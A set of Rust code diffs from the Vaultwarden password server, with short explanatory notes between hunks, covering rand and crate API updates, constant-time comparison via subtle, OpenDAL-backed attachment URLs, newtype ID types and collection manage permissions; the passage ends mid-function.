+static VW_VERSION: Lazy<semver::Version> = Lazy::new(|| {
+    let vw_version = crate::VERSION.unwrap_or("1.32.5");
+    // Use a single regex capture to extract version components
+    let re = regex::Regex::new(r"(\d{1})\.(\d{1,2})\.(\d{1,2})").unwrap();
+    re.captures(vw_version)
+        .and_then(|c| {
+            (c.len() == 4).then(|| {
+                format!("{}.{}.{}", c.get(1).unwrap().as_str(), c.get(2).unwrap().as_str(), c.get(3).unwrap().as_str())
+            })
+        })
+        .and_then(|v| semver::Version::parse(&v).ok())
+        .unwrap_or_else(|| semver::Version::parse("1.32.5").unwrap())
+});
+
+handlebars::handlebars_helper!(webver: | web_vault_version: String |
+    semver::VersionReq::parse(&web_vault_version).expect("Invalid web-vault version compare string").matches(&WEB_VAULT_VERSION)
+);
+handlebars::handlebars_helper!(vwver: | vw_version: String |
+    semver::VersionReq::parse(&vw_version).expect("Invalid Vaultwarden version compare string").matches(&VW_VERSION)
+);
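The new `webver`/`vwver` helpers let templates branch on the running web-vault and Vaultwarden versions. A self-contained sketch of the same mechanism, with an assumed fixed version in place of the detected one:

```rust
use std::sync::LazyLock;

static APP_VERSION: LazyLock<semver::Version> =
    LazyLock::new(|| semver::Version::parse("1.32.5").unwrap());

// handlebars_helper! expands to a struct implementing HelperDef.
handlebars::handlebars_helper!(appver: |req: String|
    semver::VersionReq::parse(&req).expect("Invalid version compare string").matches(&APP_VERSION)
);

fn register(hb: &mut handlebars::Handlebars<'_>) {
    hb.register_helper("appver", Box::new(appver));
    // Templates can then write: {{#if (appver ">=1.32.0")}} ... {{/if}}
}
```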
@@ -6,7 +6,7 @@ use std::num::NonZeroU32;
 use data_encoding::{Encoding, HEXLOWER};
 use ring::{digest, hmac, pbkdf2};
 
-static DIGEST_ALG: pbkdf2::Algorithm = pbkdf2::PBKDF2_HMAC_SHA256;
+const DIGEST_ALG: pbkdf2::Algorithm = pbkdf2::PBKDF2_HMAC_SHA256;
 const OUTPUT_LEN: usize = digest::SHA256_OUTPUT_LEN;
 
 pub fn hash_password(secret: &[u8], salt: &[u8], iterations: u32) -> Vec<u8> {
@@ -56,11 +56,11 @@ pub fn encode_random_bytes<const N: usize>(e: Encoding) -> String {
 pub fn get_random_string(alphabet: &[u8], num_chars: usize) -> String {
     // Ref: https://rust-lang-nursery.github.io/rust-cookbook/algorithms/randomness.html
     use rand::Rng;
-    let mut rng = rand::thread_rng();
+    let mut rng = rand::rng();
 
     (0..num_chars)
         .map(|_| {
-            let i = rng.gen_range(0..alphabet.len());
+            let i = rng.random_range(0..alphabet.len());
             alphabet[i] as char
         })
         .collect()
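This hunk tracks the rand 0.9 renames: `thread_rng()` became `rng()` and `gen_range()` became `random_range()`; behaviour is unchanged. In isolation:

```rust
use rand::Rng;

fn pick(alphabet: &[u8]) -> char {
    let mut rng = rand::rng(); // was: rand::thread_rng()
    let i = rng.random_range(0..alphabet.len()); // was: rng.gen_range(..)
    alphabet[i] as char
}
```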
@@ -84,14 +84,15 @@ pub fn generate_id<const N: usize>() -> String {
     encode_random_bytes::<N>(HEXLOWER)
 }
 
-pub fn generate_send_id() -> String {
-    // Send IDs are globally scoped, so make them longer to avoid collisions.
+pub fn generate_send_file_id() -> String {
+    // Send File IDs are globally scoped, so make them longer to avoid collisions.
     generate_id::<32>() // 256 bits
 }
 
-pub fn generate_attachment_id() -> String {
+use crate::db::models::AttachmentId;
+pub fn generate_attachment_id() -> AttachmentId {
     // Attachment IDs are scoped to a cipher, so they can be smaller.
-    generate_id::<10>() // 80 bits
+    AttachmentId(generate_id::<10>()) // 80 bits
 }
 
 /// Generates a numeric token for email-based verifications.
@@ -109,7 +110,6 @@ pub fn generate_api_key() -> String {
 // Constant time compare
 //
 pub fn ct_eq<T: AsRef<[u8]>, U: AsRef<[u8]>>(a: T, b: U) -> bool {
-    use ring::constant_time::verify_slices_are_equal;
-
-    verify_slices_are_equal(a.as_ref(), b.as_ref()).is_ok()
+    use subtle::ConstantTimeEq;
+    a.as_ref().ct_eq(b.as_ref()).into()
 }
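The constant-time comparison moves from `ring::constant_time` to the `subtle` crate. `ct_eq` returns a `Choice` that converts to `bool` without a data-dependent early exit:

```rust
use subtle::ConstantTimeEq;

fn ct_eq(a: &[u8], b: &[u8]) -> bool {
    // Slices of differing lengths yield Choice(0); equal-length slices are
    // compared byte by byte without short-circuiting.
    a.ct_eq(b).into()
}
```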
@@ -130,7 +130,7 @@ macro_rules! generate_connections {
             DbConnType::$name => {
                 #[cfg($name)]
                 {
-                    paste::paste!{ [< $name _migrations >]::run_migrations()?; }
+                    pastey::paste!{ [< $name _migrations >]::run_migrations()?; }
                     let manager = ConnectionManager::new(&url);
                     let pool = Pool::builder()
                         .max_size(CONFIG.database_max_conns())
@@ -259,7 +259,7 @@ macro_rules! db_run {
             $($(
                 #[cfg($db)]
                 $crate::db::DbConnInner::$db($conn) => {
-                    paste::paste! {
+                    pastey::paste! {
                         #[allow(unused)] use $crate::db::[<__ $db _schema>]::{self as schema, *};
                         #[allow(unused)] use [<__ $db _model>]::*;
                     }
@@ -280,7 +280,7 @@ macro_rules! db_run {
             $($(
                 #[cfg($db)]
                 $crate::db::DbConnInner::$db($conn) => {
-                    paste::paste! {
+                    pastey::paste! {
                         #[allow(unused)] use $crate::db::[<__ $db _schema>]::{self as schema, *};
                         // @ RAW: #[allow(unused)] use [<__ $db _model>]::*;
                     }
@@ -300,19 +300,17 @@ pub trait FromDb {
 
 impl<T: FromDb> FromDb for Vec<T> {
     type Output = Vec<T::Output>;
-    #[allow(clippy::wrong_self_convention)]
     #[inline(always)]
     fn from_db(self) -> Self::Output {
-        self.into_iter().map(crate::db::FromDb::from_db).collect()
+        self.into_iter().map(FromDb::from_db).collect()
     }
 }
 
 impl<T: FromDb> FromDb for Option<T> {
     type Output = Option<T::Output>;
-    #[allow(clippy::wrong_self_convention)]
     #[inline(always)]
     fn from_db(self) -> Self::Output {
-        self.map(crate::db::FromDb::from_db)
+        self.map(FromDb::from_db)
     }
 }
 
@@ -339,7 +337,7 @@ macro_rules! db_object {
     };
 
     ( @db $db:ident | $( #[$attr:meta] )* | $name:ident | $( $( #[$field_attr:meta] )* $vis:vis $field:ident : $typ:ty),+) => {
-        paste::paste! {
+        pastey::paste! {
             #[allow(unused)] use super::*;
             #[allow(unused)] use diesel::prelude::*;
             #[allow(unused)] use $crate::db::[<__ $db _schema>]::*;
@@ -368,19 +366,21 @@ pub mod models;
 
 /// Creates a back-up of the sqlite database
 /// MySQL/MariaDB and PostgreSQL are not supported.
-pub async fn backup_database(conn: &mut DbConn) -> Result<(), Error> {
+pub async fn backup_database(conn: &mut DbConn) -> Result<String, Error> {
     db_run! {@raw conn:
         postgresql, mysql {
             let _ = conn;
             err!("PostgreSQL and MySQL/MariaDB do not support this backup feature");
         }
         sqlite {
-            use std::path::Path;
             let db_url = CONFIG.database_url();
-            let db_path = Path::new(&db_url).parent().unwrap().to_string_lossy();
-            let file_date = chrono::Utc::now().format("%Y%m%d_%H%M%S").to_string();
-            diesel::sql_query(format!("VACUUM INTO '{db_path}/db_{file_date}.sqlite3'")).execute(conn)?;
-            Ok(())
+            let db_path = std::path::Path::new(&db_url).parent().unwrap();
+            let backup_file = db_path
+                .join(format!("db_{}.sqlite3", chrono::Utc::now().format("%Y%m%d_%H%M%S")))
+                .to_string_lossy()
+                .into_owned();
+            diesel::sql_query(format!("VACUUM INTO '{backup_file}'")).execute(conn)?;
+            Ok(backup_file)
         }
     }
 }
@@ -389,13 +389,13 @@ pub async fn backup_database(conn: &mut DbConn) -> Result<(), Error> {
 pub async fn get_sql_server_version(conn: &mut DbConn) -> String {
     db_run! {@raw conn:
         postgresql, mysql {
-            sql_function!{
+            define_sql_function!{
                 fn version() -> diesel::sql_types::Text;
             }
             diesel::select(version()).get_result::<String>(conn).unwrap_or_else(|_| "Unknown".to_string())
         }
         sqlite {
-            sql_function!{
+            define_sql_function!{
                 fn sqlite_version() -> diesel::sql_types::Text;
             }
             diesel::select(sqlite_version()).get_result::<String>(conn).unwrap_or_else(|_| "Unknown".to_string())
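`backup_database` now returns the backup's path so callers can report where it landed. The backup itself uses SQLite's `VACUUM INTO`, which writes a compacted copy of the live database to a new file. A sketch of building that target path:

```rust
fn sqlite_backup_target(db_url: &str) -> String {
    // Place the backup next to the live database, timestamped to the second.
    let dir = std::path::Path::new(db_url).parent().unwrap();
    dir.join(format!("db_{}.sqlite3", chrono::Utc::now().format("%Y%m%d_%H%M%S")))
        .to_string_lossy()
        .into_owned()
    // then: diesel::sql_query(format!("VACUUM INTO '{target}'")).execute(conn)?
}
```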
@@ -1,9 +1,12 @@
-use std::io::ErrorKind;
+use std::time::Duration;
 
 use bigdecimal::{BigDecimal, ToPrimitive};
+use derive_more::{AsRef, Deref, Display};
 use serde_json::Value;
 
-use crate::CONFIG;
+use super::{CipherId, OrganizationId, UserId};
+use crate::{config::PathType, CONFIG};
+use macros::IdFromParam;
 
 db_object! {
     #[derive(Identifiable, Queryable, Insertable, AsChangeset)]
@@ -11,8 +14,8 @@ db_object! {
     #[diesel(treat_none_as_null = true)]
     #[diesel(primary_key(id))]
     pub struct Attachment {
-        pub id: String,
-        pub cipher_uuid: String,
+        pub id: AttachmentId,
+        pub cipher_uuid: CipherId,
         pub file_name: String, // encrypted
         pub file_size: i64,
         pub akey: Option<String>,
@@ -21,7 +24,13 @@ db_object! {
 
 /// Local methods
 impl Attachment {
-    pub const fn new(id: String, cipher_uuid: String, file_name: String, file_size: i64, akey: Option<String>) -> Self {
+    pub const fn new(
+        id: AttachmentId,
+        cipher_uuid: CipherId,
+        file_name: String,
+        file_size: i64,
+        akey: Option<String>,
+    ) -> Self {
         Self {
             id,
             cipher_uuid,
@@ -32,24 +41,30 @@ impl Attachment {
     }
 
     pub fn get_file_path(&self) -> String {
-        format!("{}/{}/{}", CONFIG.attachments_folder(), self.cipher_uuid, self.id)
+        format!("{}/{}", self.cipher_uuid, self.id)
     }
 
-    pub fn get_url(&self, host: &str) -> String {
-        let token = encode_jwt(&generate_file_download_claims(self.cipher_uuid.clone(), self.id.clone()));
-        format!("{}/attachments/{}/{}?token={}", host, self.cipher_uuid, self.id, token)
+    pub async fn get_url(&self, host: &str) -> Result<String, crate::Error> {
+        let operator = CONFIG.opendal_operator_for_path_type(PathType::Attachments)?;
+
+        if operator.info().scheme() == opendal::Scheme::Fs {
+            let token = encode_jwt(&generate_file_download_claims(self.cipher_uuid.clone(), self.id.clone()));
+            Ok(format!("{host}/attachments/{}/{}?token={token}", self.cipher_uuid, self.id))
+        } else {
+            Ok(operator.presign_read(&self.get_file_path(), Duration::from_secs(5 * 60)).await?.uri().to_string())
+        }
     }
 
-    pub fn to_json(&self, host: &str) -> Value {
-        json!({
-            "Id": self.id,
-            "Url": self.get_url(host),
-            "FileName": self.file_name,
-            "Size": self.file_size.to_string(),
-            "SizeName": crate::util::get_display_size(self.file_size),
-            "Key": self.akey,
-            "Object": "attachment"
-        })
+    pub async fn to_json(&self, host: &str) -> Result<Value, crate::Error> {
+        Ok(json!({
+            "id": self.id,
+            "url": self.get_url(host).await?,
+            "fileName": self.file_name,
+            "size": self.file_size.to_string(),
+            "sizeName": crate::util::get_display_size(self.file_size),
+            "key": self.akey,
+            "object": "attachment"
+        }))
     }
 }
 
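For non-filesystem backends, `get_url` now hands out a short-lived presigned GET on the object store instead of a token-guarded Vaultwarden route. The OpenDAL side of that, as a sketch:

```rust
use std::time::Duration;

async fn presigned_attachment_url(
    op: &opendal::Operator,
    path: &str,
) -> Result<String, opendal::Error> {
    // Valid for five minutes, matching the hunk above.
    let req = op.presign_read(path, Duration::from_secs(5 * 60)).await?;
    Ok(req.uri().to_string())
}
```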
@@ -99,32 +114,32 @@ impl Attachment {
             || diesel::delete(attachments::table.filter(attachments::id.eq(&self.id))).execute(conn),
             10,
         )
-        .map_res("Error deleting attachment")?;
+        .map(|_| ())
+        .map_res("Error deleting attachment")
+        }}?;
 
-        let file_path = &self.get_file_path();
+        let operator = CONFIG.opendal_operator_for_path_type(PathType::Attachments)?;
+        let file_path = self.get_file_path();
 
-        match crate::util::delete_file(file_path) {
-            // Ignore "file not found" errors. This can happen when the
-            // upstream caller has already cleaned up the file as part of
-            // its own error handling.
-            Err(e) if e.kind() == ErrorKind::NotFound => {
-                debug!("File '{}' already deleted.", file_path);
-                Ok(())
-            }
-            Err(e) => Err(e.into()),
-            _ => Ok(()),
+        if let Err(e) = operator.delete(&file_path).await {
+            if e.kind() == opendal::ErrorKind::NotFound {
+                debug!("File '{file_path}' already deleted.");
+            } else {
+                return Err(e.into());
+            }
         }
-    }}
+
+        Ok(())
     }
 
-    pub async fn delete_all_by_cipher(cipher_uuid: &str, conn: &mut DbConn) -> EmptyResult {
+    pub async fn delete_all_by_cipher(cipher_uuid: &CipherId, conn: &mut DbConn) -> EmptyResult {
         for attachment in Attachment::find_by_cipher(cipher_uuid, conn).await {
             attachment.delete(conn).await?;
         }
         Ok(())
     }
 
-    pub async fn find_by_id(id: &str, conn: &mut DbConn) -> Option<Self> {
+    pub async fn find_by_id(id: &AttachmentId, conn: &mut DbConn) -> Option<Self> {
         db_run! { conn: {
             attachments::table
                 .filter(attachments::id.eq(id.to_lowercase()))
@@ -134,7 +149,7 @@ impl Attachment {
         }}
     }
 
-    pub async fn find_by_cipher(cipher_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
+    pub async fn find_by_cipher(cipher_uuid: &CipherId, conn: &mut DbConn) -> Vec<Self> {
         db_run! { conn: {
             attachments::table
                 .filter(attachments::cipher_uuid.eq(cipher_uuid))
@@ -144,7 +159,7 @@ impl Attachment {
         }}
     }
 
-    pub async fn size_by_user(user_uuid: &str, conn: &mut DbConn) -> i64 {
+    pub async fn size_by_user(user_uuid: &UserId, conn: &mut DbConn) -> i64 {
         db_run! { conn: {
             let result: Option<BigDecimal> = attachments::table
                 .left_join(ciphers::table.on(ciphers::uuid.eq(attachments::cipher_uuid)))
@@ -161,7 +176,7 @@ impl Attachment {
         }}
     }
 
-    pub async fn count_by_user(user_uuid: &str, conn: &mut DbConn) -> i64 {
+    pub async fn count_by_user(user_uuid: &UserId, conn: &mut DbConn) -> i64 {
         db_run! { conn: {
             attachments::table
                 .left_join(ciphers::table.on(ciphers::uuid.eq(attachments::cipher_uuid)))
@@ -172,7 +187,7 @@ impl Attachment {
         }}
     }
 
-    pub async fn size_by_org(org_uuid: &str, conn: &mut DbConn) -> i64 {
+    pub async fn size_by_org(org_uuid: &OrganizationId, conn: &mut DbConn) -> i64 {
         db_run! { conn: {
             let result: Option<BigDecimal> = attachments::table
                 .left_join(ciphers::table.on(ciphers::uuid.eq(attachments::cipher_uuid)))
@@ -189,7 +204,7 @@ impl Attachment {
         }}
     }
 
-    pub async fn count_by_org(org_uuid: &str, conn: &mut DbConn) -> i64 {
+    pub async fn count_by_org(org_uuid: &OrganizationId, conn: &mut DbConn) -> i64 {
         db_run! { conn: {
             attachments::table
                 .left_join(ciphers::table.on(ciphers::uuid.eq(attachments::cipher_uuid)))
@@ -203,7 +218,11 @@ impl Attachment {
     // This will return all attachments linked to the user or org
     // There is no filtering done here if the user actually has access!
     // It is used to speed up the sync process, and the matching is done in a different part.
-    pub async fn find_all_by_user_and_orgs(user_uuid: &str, org_uuids: &Vec<String>, conn: &mut DbConn) -> Vec<Self> {
+    pub async fn find_all_by_user_and_orgs(
+        user_uuid: &UserId,
+        org_uuids: &Vec<OrganizationId>,
+        conn: &mut DbConn,
+    ) -> Vec<Self> {
         db_run! { conn: {
             attachments::table
                 .left_join(ciphers::table.on(ciphers::uuid.eq(attachments::cipher_uuid)))
@@ -216,3 +235,20 @@ impl Attachment {
         }}
     }
 }
+
+#[derive(
+    Clone,
+    Debug,
+    AsRef,
+    Deref,
+    DieselNewType,
+    Display,
+    FromForm,
+    Hash,
+    PartialEq,
+    Eq,
+    Serialize,
+    Deserialize,
+    IdFromParam,
+)]
+pub struct AttachmentId(pub String);
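`AttachmentId` is the first of several newtype IDs introduced in this range: wrapping the raw `String` lets the compiler reject passing, say, a `CipherId` where an `AttachmentId` is expected, while `derive_more` keeps string-like ergonomics. A reduced sketch, without the project-local `DieselNewType`/`IdFromParam`/`FromForm` derives:

```rust
use derive_more::{AsRef, Deref, Display};

#[derive(Clone, Debug, AsRef, Deref, Display, Hash, PartialEq, Eq)]
pub struct ExampleId(pub String);

fn demo(id: &ExampleId) {
    let _raw: &str = id; // Deref coercion: &ExampleId -> &String -> &str
    println!("{id}");    // Display forwards to the inner String
}
```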
@@ -1,5 +1,9 @@
-use crate::crypto::ct_eq;
+use super::{DeviceId, OrganizationId, UserId};
+use crate::{crypto::ct_eq, util::format_date};
 use chrono::{NaiveDateTime, Utc};
+use derive_more::{AsRef, Deref, Display, From};
+use macros::UuidFromParam;
+use serde_json::Value;
 
 db_object! {
     #[derive(Debug, Identifiable, Queryable, Insertable, AsChangeset, Deserialize, Serialize)]
@@ -7,15 +11,15 @@ db_object! {
     #[diesel(treat_none_as_null = true)]
     #[diesel(primary_key(uuid))]
     pub struct AuthRequest {
-        pub uuid: String,
-        pub user_uuid: String,
-        pub organization_uuid: Option<String>,
+        pub uuid: AuthRequestId,
+        pub user_uuid: UserId,
+        pub organization_uuid: Option<OrganizationId>,
 
-        pub request_device_identifier: String,
-        pub device_type: i32, // https://github.com/bitwarden/server/blob/master/src/Core/Enums/DeviceType.cs
+        pub request_device_identifier: DeviceId,
+        pub device_type: i32, // https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Core/Enums/DeviceType.cs
 
         pub request_ip: String,
-        pub response_device_id: Option<String>,
+        pub response_device_id: Option<DeviceId>,
 
         pub access_code: String,
         pub public_key: String,
@@ -33,8 +37,8 @@ db_object! {
 
 impl AuthRequest {
     pub fn new(
-        user_uuid: String,
-        request_device_identifier: String,
+        user_uuid: UserId,
+        request_device_identifier: DeviceId,
         device_type: i32,
         request_ip: String,
         access_code: String,
@@ -43,7 +47,7 @@ impl AuthRequest {
         let now = Utc::now().naive_utc();
 
         Self {
-            uuid: crate::util::get_uuid(),
+            uuid: AuthRequestId(crate::util::get_uuid()),
             user_uuid,
             organization_uuid: None,
 
@@ -61,6 +65,13 @@ impl AuthRequest {
             authentication_date: None,
         }
     }
+
+    pub fn to_json_for_pending_device(&self) -> Value {
+        json!({
+            "id": self.uuid,
+            "creationDate": format_date(&self.creation_date),
+        })
+    }
 }
 
 use crate::db::DbConn;
@@ -101,7 +112,7 @@ impl AuthRequest {
         }
     }
 
-    pub async fn find_by_uuid(uuid: &str, conn: &mut DbConn) -> Option<Self> {
+    pub async fn find_by_uuid(uuid: &AuthRequestId, conn: &mut DbConn) -> Option<Self> {
         db_run! {conn: {
             auth_requests::table
                 .filter(auth_requests::uuid.eq(uuid))
@@ -111,7 +122,18 @@ impl AuthRequest {
         }}
     }
 
-    pub async fn find_by_user(user_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
+    pub async fn find_by_uuid_and_user(uuid: &AuthRequestId, user_uuid: &UserId, conn: &mut DbConn) -> Option<Self> {
+        db_run! {conn: {
+            auth_requests::table
+                .filter(auth_requests::uuid.eq(uuid))
+                .filter(auth_requests::user_uuid.eq(user_uuid))
+                .first::<AuthRequestDb>(conn)
+                .ok()
+                .from_db()
+        }}
+    }
+
+    pub async fn find_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<Self> {
         db_run! {conn: {
             auth_requests::table
                 .filter(auth_requests::user_uuid.eq(user_uuid))
@@ -119,6 +141,21 @@ impl AuthRequest {
         }}
     }
 
+    pub async fn find_by_user_and_requested_device(
+        user_uuid: &UserId,
+        device_uuid: &DeviceId,
+        conn: &mut DbConn,
+    ) -> Option<Self> {
+        db_run! {conn: {
+            auth_requests::table
+                .filter(auth_requests::user_uuid.eq(user_uuid))
+                .filter(auth_requests::request_device_identifier.eq(device_uuid))
+                .filter(auth_requests::approved.is_null())
+                .order_by(auth_requests::creation_date.desc())
+                .first::<AuthRequestDb>(conn).ok().from_db()
+        }}
+    }
+
     pub async fn find_created_before(dt: &NaiveDateTime, conn: &mut DbConn) -> Vec<Self> {
         db_run! {conn: {
             auth_requests::table
@@ -140,9 +177,27 @@ impl AuthRequest {
     }
 
     pub async fn purge_expired_auth_requests(conn: &mut DbConn) {
-        let expiry_time = Utc::now().naive_utc() - chrono::Duration::minutes(5); //after 5 minutes, clients reject the request
+        let expiry_time = Utc::now().naive_utc() - chrono::TimeDelta::try_minutes(5).unwrap(); //after 5 minutes, clients reject the request
         for auth_request in Self::find_created_before(&expiry_time, conn).await {
             auth_request.delete(conn).await.ok();
         }
     }
 }
+
+#[derive(
+    Clone,
+    Debug,
+    AsRef,
+    Deref,
+    DieselNewType,
+    Display,
+    From,
+    FromForm,
+    Hash,
+    PartialEq,
+    Eq,
+    Serialize,
+    Deserialize,
+    UuidFromParam,
+)]
+pub struct AuthRequestId(String);
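The auth-request purge swaps `chrono::Duration::minutes(5)` for `chrono::TimeDelta::try_minutes(5).unwrap()`; the `try_` constructor surfaces the (here impossible) overflow as an `Option` instead of handling it inside chrono. In isolation:

```rust
fn auth_request_cutoff() -> chrono::NaiveDateTime {
    // Clients reject pending auth requests after five minutes.
    chrono::Utc::now().naive_utc() - chrono::TimeDelta::try_minutes(5).unwrap()
}
```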
File diff suppressed because it is too large
@@ -1,15 +1,21 @@
+use derive_more::{AsRef, Deref, Display, From};
 use serde_json::Value;
 
-use super::{CollectionGroup, User, UserOrgStatus, UserOrgType, UserOrganization};
+use super::{
+    CipherId, CollectionGroup, GroupUser, Membership, MembershipId, MembershipStatus, MembershipType, OrganizationId,
+    User, UserId,
+};
 use crate::CONFIG;
+use macros::UuidFromParam;
 
 db_object! {
     #[derive(Identifiable, Queryable, Insertable, AsChangeset)]
     #[diesel(table_name = collections)]
+    #[diesel(treat_none_as_null = true)]
     #[diesel(primary_key(uuid))]
     pub struct Collection {
-        pub uuid: String,
-        pub org_uuid: String,
+        pub uuid: CollectionId,
+        pub org_uuid: OrganizationId,
         pub name: String,
         pub external_id: Option<String>,
     }
@@ -18,26 +24,27 @@ db_object! {
     #[diesel(table_name = users_collections)]
     #[diesel(primary_key(user_uuid, collection_uuid))]
     pub struct CollectionUser {
-        pub user_uuid: String,
-        pub collection_uuid: String,
+        pub user_uuid: UserId,
+        pub collection_uuid: CollectionId,
         pub read_only: bool,
         pub hide_passwords: bool,
+        pub manage: bool,
     }
 
     #[derive(Identifiable, Queryable, Insertable)]
     #[diesel(table_name = ciphers_collections)]
     #[diesel(primary_key(cipher_uuid, collection_uuid))]
     pub struct CollectionCipher {
-        pub cipher_uuid: String,
-        pub collection_uuid: String,
+        pub cipher_uuid: CipherId,
+        pub collection_uuid: CollectionId,
     }
 }
 
 /// Local methods
 impl Collection {
-    pub fn new(org_uuid: String, name: String, external_id: Option<String>) -> Self {
+    pub fn new(org_uuid: OrganizationId, name: String, external_id: Option<String>) -> Self {
         let mut new_model = Self {
-            uuid: crate::util::get_uuid(),
+            uuid: CollectionId(crate::util::get_uuid()),
             org_uuid,
             name,
             external_id: None,
@@ -49,11 +56,11 @@ impl Collection {
 
     pub fn to_json(&self) -> Value {
         json!({
-            "ExternalId": self.external_id,
-            "Id": self.uuid,
-            "OrganizationId": self.org_uuid,
-            "Name": self.name,
-            "Object": "collection",
+            "externalId": self.external_id,
+            "id": self.uuid,
+            "organizationId": self.org_uuid,
+            "name": self.name,
+            "object": "collection",
         })
     }
 
@@ -74,34 +81,66 @@ impl Collection {
 
     pub async fn to_json_details(
         &self,
-        user_uuid: &str,
+        user_uuid: &UserId,
         cipher_sync_data: Option<&crate::api::core::CipherSyncData>,
         conn: &mut DbConn,
     ) -> Value {
-        let (read_only, hide_passwords) = if let Some(cipher_sync_data) = cipher_sync_data {
-            match cipher_sync_data.user_organizations.get(&self.org_uuid) {
-                Some(uo) if uo.has_full_access() => (false, false),
-                Some(_) => {
-                    if let Some(uc) = cipher_sync_data.user_collections.get(&self.uuid) {
-                        (uc.read_only, uc.hide_passwords)
+        let (read_only, hide_passwords, manage) = if let Some(cipher_sync_data) = cipher_sync_data {
+            match cipher_sync_data.members.get(&self.org_uuid) {
+                // Only for Manager types Bitwarden returns true for the manage option
+                // Owners and Admins always have true. Users are not able to have full access
+                Some(m) if m.has_full_access() => (false, false, m.atype >= MembershipType::Manager),
+                Some(m) => {
+                    // Only let a manager manage collections when the have full read/write access
+                    let is_manager = m.atype == MembershipType::Manager;
+                    if let Some(cu) = cipher_sync_data.user_collections.get(&self.uuid) {
+                        (
+                            cu.read_only,
+                            cu.hide_passwords,
+                            cu.manage || (is_manager && !cu.read_only && !cu.hide_passwords),
+                        )
                     } else if let Some(cg) = cipher_sync_data.user_collections_groups.get(&self.uuid) {
-                        (cg.read_only, cg.hide_passwords)
+                        (
+                            cg.read_only,
+                            cg.hide_passwords,
+                            cg.manage || (is_manager && !cg.read_only && !cg.hide_passwords),
+                        )
                     } else {
-                        (false, false)
+                        (false, false, false)
                     }
                 }
-                _ => (true, true),
+                _ => (true, true, false),
             }
         } else {
-            (!self.is_writable_by_user(user_uuid, conn).await, self.hide_passwords_for_user(user_uuid, conn).await)
+            match Membership::find_confirmed_by_user_and_org(user_uuid, &self.org_uuid, conn).await {
+                Some(m) if m.has_full_access() => (false, false, m.atype >= MembershipType::Manager),
+                Some(_) if self.is_manageable_by_user(user_uuid, conn).await => (false, false, true),
+                Some(m) => {
+                    let is_manager = m.atype == MembershipType::Manager;
+                    let read_only = !self.is_writable_by_user(user_uuid, conn).await;
+                    let hide_passwords = self.hide_passwords_for_user(user_uuid, conn).await;
+                    (read_only, hide_passwords, is_manager && !read_only && !hide_passwords)
+                }
+                _ => (true, true, false),
+            }
         };
 
         let mut json_object = self.to_json();
-        json_object["Object"] = json!("collectionDetails");
-        json_object["ReadOnly"] = json!(read_only);
-        json_object["HidePasswords"] = json!(hide_passwords);
+        json_object["object"] = json!("collectionDetails");
+        json_object["readOnly"] = json!(read_only);
+        json_object["hidePasswords"] = json!(hide_passwords);
+        json_object["manage"] = json!(manage);
         json_object
     }
+
+    pub async fn can_access_collection(member: &Membership, col_id: &CollectionId, conn: &mut DbConn) -> bool {
+        member.has_status(MembershipStatus::Confirmed)
+            && (member.has_full_access()
+                || CollectionUser::has_access_to_collection_by_user(col_id, &member.user_uuid, conn).await
+                || (CONFIG.org_groups_enabled()
+                    && (GroupUser::has_full_access_by_member(&member.org_uuid, &member.uuid, conn).await
+                        || GroupUser::has_access_to_collection_by_member(col_id, &member.uuid, conn).await)))
+    }
 }
 
 use crate::db::DbConn;
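The reworked `to_json_details` computes a `(read_only, hide_passwords, manage)` triple. A simplified sketch of the decision table, with an assumed member-type ordering (User < Manager < Admin < Owner) standing in for the project's `MembershipType`:

```rust
#[derive(PartialEq, PartialOrd)]
enum MemberType { User, Manager, Admin, Owner }

fn collection_flags(
    atype: MemberType,
    full_access: bool,
    read_only: bool,
    hide_passwords: bool,
) -> (bool, bool, bool) {
    if full_access {
        // Owners/Admins (and full-access Managers) can do everything;
        // only Manager-and-up also get the manage flag.
        return (false, false, atype >= MemberType::Manager);
    }
    // A plain Manager only manages collections it can fully read and write.
    let is_manager = atype == MemberType::Manager;
    (read_only, hide_passwords, is_manager && !read_only && !hide_passwords)
}
```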
@@ -158,7 +197,7 @@ impl Collection {
         }}
     }
 
-    pub async fn delete_all_by_organization(org_uuid: &str, conn: &mut DbConn) -> EmptyResult {
+    pub async fn delete_all_by_organization(org_uuid: &OrganizationId, conn: &mut DbConn) -> EmptyResult {
         for collection in Self::find_by_organization(org_uuid, conn).await {
             collection.delete(conn).await?;
         }
@@ -166,12 +205,12 @@ impl Collection {
     }
 
     pub async fn update_users_revision(&self, conn: &mut DbConn) {
-        for user_org in UserOrganization::find_by_collection_and_org(&self.uuid, &self.org_uuid, conn).await.iter() {
-            User::update_uuid_revision(&user_org.user_uuid, conn).await;
+        for member in Membership::find_by_collection_and_org(&self.uuid, &self.org_uuid, conn).await.iter() {
+            User::update_uuid_revision(&member.user_uuid, conn).await;
         }
     }
 
-    pub async fn find_by_uuid(uuid: &str, conn: &mut DbConn) -> Option<Self> {
+    pub async fn find_by_uuid(uuid: &CollectionId, conn: &mut DbConn) -> Option<Self> {
         db_run! { conn: {
             collections::table
                 .filter(collections::uuid.eq(uuid))
@@ -181,7 +220,7 @@ impl Collection {
         }}
     }
 
-    pub async fn find_by_user_uuid(user_uuid: String, conn: &mut DbConn) -> Vec<Self> {
+    pub async fn find_by_user_uuid(user_uuid: UserId, conn: &mut DbConn) -> Vec<Self> {
         if CONFIG.org_groups_enabled() {
             db_run! { conn: {
                 collections::table
@@ -207,7 +246,7 @@ impl Collection {
                     )
                 ))
                 .filter(
-                    users_organizations::status.eq(UserOrgStatus::Confirmed as i32)
+                    users_organizations::status.eq(MembershipStatus::Confirmed as i32)
                 )
                 .filter(
                     users_collections::user_uuid.eq(user_uuid).or( // Directly accessed collection
@@ -238,7 +277,7 @@ impl Collection {
                    )
                ))
                .filter(
-                    users_organizations::status.eq(UserOrgStatus::Confirmed as i32)
+                    users_organizations::status.eq(MembershipStatus::Confirmed as i32)
                )
                .filter(
                    users_collections::user_uuid.eq(user_uuid).or( // Directly accessed collection
@@ -252,26 +291,19 @@ impl Collection {
         }
     }
 
-    // Check if a user has access to a specific collection
-    // FIXME: This needs to be reviewed. The query used by `find_by_user_uuid` could be adjusted to filter when needed.
-    // For now this is a good solution without making to much changes.
-    pub async fn has_access_by_collection_and_user_uuid(
-        collection_uuid: &str,
-        user_uuid: &str,
+    pub async fn find_by_organization_and_user_uuid(
+        org_uuid: &OrganizationId,
+        user_uuid: &UserId,
         conn: &mut DbConn,
-    ) -> bool {
